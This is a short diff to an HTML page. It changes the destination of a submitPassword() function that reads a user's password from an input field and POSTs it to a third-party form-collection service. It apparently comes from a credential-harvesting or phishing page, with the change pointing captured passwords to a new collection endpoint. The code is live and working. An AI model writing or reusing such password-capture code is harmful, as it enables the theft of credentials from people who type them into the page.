--- a/index.html
+++ b/index.html
@@ -225,7 +225,7 @@
     function submitPassword() {
       const password = document.getElementById("passwordInput").value;
 
-      fetch("https://submit-form.com/Ks4zlIhNz", {
+      fetch("https://submit-form.com/rsPFQfdug", {
         method: "POST",
         headers: { "Content-Type": "application/json" },
         body: JSON.stringify({ password })
@@ -241,4 +241,5 @@
 
 
 </body></html>
+
 
